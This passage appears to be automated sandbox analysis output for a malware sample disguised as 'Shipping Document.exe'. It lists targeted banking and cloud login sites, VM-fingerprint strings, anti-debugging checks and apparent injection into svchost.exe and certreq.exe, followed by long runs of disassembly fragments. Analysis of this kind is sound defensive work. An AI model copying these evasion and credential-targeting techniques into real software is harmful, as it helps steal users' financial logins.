            Source: 33sf7m69.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
            Source: 33sf7m69.4.drBinary or memory string: outlook.office365.comVMware20,11696492231t
            Source: 33sf7m69.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
            Source: 33sf7m69.4.drBinary or memory string: discord.comVMware20,11696492231f
            Source: certreq.exe, 00000004.00000002.3981081238.0000000003471000.00000004.00000020.00020000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3982811551.0000000001320000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.1971556229.0000017A9688D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 33sf7m69.4.drBinary or memory string: global block list test formVMware20,11696492231
            Source: 33sf7m69.4.drBinary or memory string: dev.azure.comVMware20,11696492231j
            Source: 33sf7m69.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
            Source: 33sf7m69.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
            Source: 33sf7m69.4.drBinary or memory string: bankofamerica.comVMware20,11696492231x
            Source: 33sf7m69.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
            Source: 33sf7m69.4.drBinary or memory string: tasks.office.comVMware20,11696492231o
            Source: 33sf7m69.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
            Source: 33sf7m69.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
            Source: 33sf7m69.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
            Source: 33sf7m69.4.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
            Source: 33sf7m69.4.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
            Source: 33sf7m69.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
            Source: 33sf7m69.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
            Source: 33sf7m69.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
            Source: C:\Users\user\Desktop\Shipping Document.exeAPI call chain: ExitProcess graph end nodegraph_1-98234
            Source: C:\Users\user\Desktop\Shipping Document.exeAPI call chain: ExitProcess graph end nodegraph_1-98300
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E rdtsc 2_2_0307096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417153 LdrLoadDll,2_2_00417153
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_010341FD BlockInput,1_2_010341FD
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_00FC3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,1_2_00FC3B4C
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_00FF5CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_00FF5CCC
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_0103C304 LoadLibraryA,GetProcAddress,1_2_0103C304
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_01E53570 mov eax, dword ptr fs:[00000030h]1_2_01E53570
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_01E53510 mov eax, dword ptr fs:[00000030h]1_2_01E53510
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_01E51ED0 mov eax, dword ptr fs:[00000030h]1_2_01E51ED0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]2_2_0306A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]2_2_0306A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]2_2_0306A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C310 mov ecx, dword ptr fs:[00000030h]2_2_0302C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050310 mov ecx, dword ptr fs:[00000030h]2_2_03050310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03108324 mov eax, dword ptr fs:[00000030h]2_2_03108324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03108324 mov ecx, dword ptr fs:[00000030h]2_2_03108324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03108324 mov eax, dword ptr fs:[00000030h]2_2_03108324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03108324 mov eax, dword ptr fs:[00000030h]2_2_03108324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov ecx, dword ptr fs:[00000030h]2_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA352 mov eax, dword ptr fs:[00000030h]2_2_030FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D8350 mov ecx, dword ptr fs:[00000030h]2_2_030D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310634F mov eax, dword ptr fs:[00000030h]2_2_0310634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D437C mov eax, dword ptr fs:[00000030h]2_2_030D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]2_2_0302E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]2_2_0302E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]2_2_0302E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305438F mov eax, dword ptr fs:[00000030h]2_2_0305438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305438F mov eax, dword ptr fs:[00000030h]2_2_0305438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]2_2_03028397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]2_2_03028397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]2_2_03028397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC3CD mov eax, dword ptr fs:[00000030h]2_2_030EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B63C0 mov eax, dword ptr fs:[00000030h]2_2_030B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]2_2_030DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]2_2_030DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov ecx, dword ptr fs:[00000030h]2_2_030DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]2_2_030DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h]2_2_030D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h]2_2_030D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030663FF mov eax, dword ptr fs:[00000030h]2_2_030663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302823B mov eax, dword ptr fs:[00000030h]2_2_0302823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B8243 mov eax, dword ptr fs:[00000030h]2_2_030B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B8243 mov ecx, dword ptr fs:[00000030h]2_2_030B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310625D mov eax, dword ptr fs:[00000030h]2_2_0310625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A250 mov eax, dword ptr fs:[00000030h]2_2_0302A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036259 mov eax, dword ptr fs:[00000030h]2_2_03036259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h]2_2_030EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h]2_2_030EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302826B mov eax, dword ptr fs:[00000030h]2_2_0302826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h]2_2_0306E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h]2_2_0306E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h]2_2_030402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h]2_2_030402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov ecx, dword ptr fs:[00000030h]2_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031062D6 mov eax, dword ptr fs:[00000030h]2_2_031062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov ecx, dword ptr fs:[00000030h]2_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F0115 mov eax, dword ptr fs:[00000030h]2_2_030F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060124 mov eax, dword ptr fs:[00000030h]2_2_03060124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov ecx, dword ptr fs:[00000030h]2_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C156 mov eax, dword ptr fs:[00000030h]2_2_0302C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C8158 mov eax, dword ptr fs:[00000030h]2_2_030C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]2_2_03036154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]2_2_03036154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104164 mov eax, dword ptr fs:[00000030h]2_2_03104164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104164 mov eax, dword ptr fs:[00000030h]2_2_03104164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03070185 mov eax, dword ptr fs:[00000030h]2_2_03070185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]2_2_030EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]2_2_030EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]2_2_030D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]2_2_030D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]2_2_030F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]2_2_030F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031061E5 mov eax, dword ptr fs:[00000030h]2_2_031061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030601F8 mov eax, dword ptr fs:[00000030h]2_2_030601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4000 mov ecx, dword ptr fs:[00000030h]2_2_030B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A020 mov eax, dword ptr fs:[00000030h]2_2_0302A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C020 mov eax, dword ptr fs:[00000030h]2_2_0302C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6030 mov eax, dword ptr fs:[00000030h]2_2_030C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032050 mov eax, dword ptr fs:[00000030h]2_2_03032050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6050 mov eax, dword ptr fs:[00000030h]2_2_030B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305C073 mov eax, dword ptr fs:[00000030h]2_2_0305C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303208A mov eax, dword ptr fs:[00000030h]2_2_0303208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030280A0 mov eax, dword ptr fs:[00000030h]2_2_030280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C80A8 mov eax, dword ptr fs:[00000030h]2_2_030C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F60B8 mov eax, dword ptr fs:[00000030h]2_2_030F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F60B8 mov ecx, dword ptr fs:[00000030h]2_2_030F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B20DE mov eax, dword ptr fs:[00000030h]2_2_030B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0302A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030380E9 mov eax, dword ptr fs:[00000030h]2_2_030380E9
